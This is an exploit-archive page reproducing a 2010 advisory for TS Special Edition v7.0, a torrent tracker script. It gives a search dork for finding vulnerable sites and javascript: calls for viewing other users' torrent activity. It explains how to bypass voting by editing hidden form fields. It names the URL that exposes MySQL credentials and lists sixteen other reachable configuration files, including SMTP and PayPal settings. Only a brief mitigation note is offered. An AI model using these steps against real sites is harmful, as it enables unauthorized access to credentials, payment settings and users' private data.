TS Special Edition - exploit.company

vendor:

TS Special Edition

by:

IHTeam

8,8

CVSS

HIGH

See any seed/leech files of any users, Bypass Vote System, MySQL Credential, XSS, SQL Injection

79, 89, 564, 89, 89

CWE

Product Name: TS Special Edition

Affected Version From: v.7.0

Affected Version To: v.7.0

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

TS Special Edition <= v.7.0 Multiple Vulnerabilities

The TS Special Edition <= v.7.0 is vulnerable to multiple vulnerabilities. An attacker can exploit the vulnerability to gain access to seed/leech files of any users, bypass the vote system, access the MySQL credentials, and perform XSS and SQL Injection attacks.

Mitigation:

The user should upgrade to the latest version of TS Special Edition and add .htaccess in the /config/ directory.

Source

Exploit-DB raw data:

##############################################################################################
#
# TS Special Edition <= v.7.0 Multiple Vulnerabilities
# Dork: "Powered by TS Special Edition"
# Site: http://templateshares.net
# Download: http://templateshares.net/special/purchase
# Reported on 02/05/2010
#
# Author: IHTeam
#
##############################################################################################
#
# See any seed/leech files of any users
#
# 1) Open any userdatail you want (Ex: /userdetails.php?id=1)
# 2) Paste in url bar this code for:
# 2.1) javascript:TSAjaxRequest('showuploaded'); <---- See Uploaded Torrent
# 2.2) javascript:TSAjaxRequest('showcompleted'); <---- See Completed
Torrent
# 2.3) javascript:TSAjaxRequest('showleechs'); <---- See In Leech
Torrents
# 2.4) javascript:TSAjaxRequest('showseeds'); <---- See In Seed Torrents
# 2.5) javascript:TSAjaxRequest('showsnatches'); <---- See Recently
Downloaded
#
##############################################################################################
#
# Bypass Vote System
#
# 1) Open any torrent file datail (Ex: /details.php?id=1)
# 2) Edit HTML Source code with FireBug or Opera
# 3) Search 'form id="quickrate"' and edit these information:
# 3.1) <input type="hidden" value="CHAGE_YOUR_ID_HERE" name="userid">
# 3.2) javascript:TSQuickRate('torrent_1', 'CHAGE_YOUR_ID_HERE');
# 4) Apply changes and vote the torrent every time you want
#
##############################################################################################
#
# MySQL Credential
#
# You can see MySQL Credential by opening /config/DATABASE
#
# Ex: www.mysite.com/config/DATABASE
#
a:4:{s:10:"mysql_host";s:9:"HOSTNAME_OF_MYSQL_DATABASE";s:10:"mysql_user";s:11:"USERNAME_OF_MYSQL"
#
;s:10:"mysql_pass";s:10:"PASSWORD_OF_MYSQL";s:8:"mysql_db";s:21:"DATABASE_NAME";}
#
# It can be fixed adding .htaccess in /config/ directory
##############################################################################################
#
# Others configuration files
#
# 1) /config/WAITSLOT
# 2) /config/TWEAK
# 3) /config/THEME
# 4) /config/STAFFTEAM
# 5) /config/SMTP
# 6) /config/SEO
# 7) /config/SECURITY
# 8) /config/REDIRECT
# 9) /config/PJIRC
# 10) /config/PAYPAL
# 11) /config/MAIN
# 12) /config/KPS
# 13) /config/FORUMCP
# 14) /config/EXTRA
# 15) /config/DATETIME
# 16) /config/CLEANUP
# 17) /pjirc/pjirc.cfg
#
##############################################################################################